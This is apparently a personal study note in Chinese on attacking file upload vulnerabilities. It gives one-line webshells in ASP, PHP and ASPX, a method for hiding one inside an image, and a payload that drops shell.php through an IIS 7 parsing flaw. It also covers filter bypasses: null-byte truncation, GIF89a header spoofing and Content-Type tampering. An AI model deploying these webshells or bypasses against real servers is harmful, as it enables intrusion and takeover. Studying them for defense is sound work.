整理一下有关上传漏洞
主要讲一下通过一句话木马来对服务器上传漏洞进行攻击。
一句木马好处介绍
短小精悍,隐蔽性好,为之后上传大马来对服务器提权做准备。
一句话木马的常见写法
asp一句话木马
<% eval request(“kobe”)%>
php一句话木马
<?php @eval($_post[kobe]);?>
aspx一句话木马
<% @Page Language=”Jscript”%>
<% eval(Request.Item[“value”])%>
还有很多就不一一列了
制作木马过程
1.通过01编辑器打开图片,在图片的末尾写入木马语句。
2.在中断使用命令来写 copy /b 1.jpg+1.asp 2.jpg
3.使用文件包含在asp脚本中写入来包含1.jpg文件防止被查杀
漏洞分析
解析漏洞(指服务器在对文件或者文件路径解析时,在某种情况下将文件解释成脚本文件格式的漏洞)
1.IIS5.0/6下的解析漏洞
1.建立文件名为xx.asp的文件夹,文件夹中的文件会被当成asp脚本来执行
2.将文件名命名为xx.asp;.jpg,分号后面的内容会不进行解析,文件被服务器会当成xx.asp文件
2.apache解析漏洞
1.apache对于文件名的解析方式是通过对于文件名先从右到左解析,若没有发现能解析的文件名在从左
到右解析(那就可以构造如1.php.xxx这样的文件名来绕过)
2.如果在apache镇南关.htaccess可执行且可被上传,那么尝试在.htaccess文件中写入
3.IIS7.0/7.5畸形解析漏洞
在默认Fast-CGI开启状态下,黑阔上传一个名为yt.jpg,文件里面的内容为<?php fputs(fopen(‘shell..ph
p’,’w’),”<?php eval($_post[yt])?>”);?>然后再网页上访问yt.jpg/.php
在这个目录下就会生成含有一句话木马的shell.php文件
4.nginx在8.03版本下空字节代码执行漏洞
上传一个含有一句话木马的图片,用bp来抓包,将原来的1.jpg文件改为xxx.php%00.jpg,通过00截断来使得
文件名变为xxx.php.服务器就会来执行这个脚本文件。
上传漏洞
服务器上文件命名规则:
1.上传文件名和服务器命名一致
2.上传文件名和服务器命名不一致
1.文件头欺骗的漏洞
在一句话木马文件头前面加入GIF89a,然后将木马保存为图片的格式,可以绕过简单的waf
2.filepath漏洞(基于IIS5/6)
具体方法参照上文的解析漏洞
3.00截断发
主要通过bp抓包来实现,可以结合上文的解析漏洞来看
4.filetype漏洞
上传文件时通过修改文件类型,来触发漏洞。
例如上传的是一张图片,抓包的content-type的类型为 image/jpge,下面是具体图片的内容
那么可以通过修改content-type的类型改为,text/php,然后下面的内容就改为所上传的一句话木马。
5.双文件上传漏洞
第一个上传正常的文件,第二个上传含有木马的文件
漏洞都比较老,还是要在继续学习呀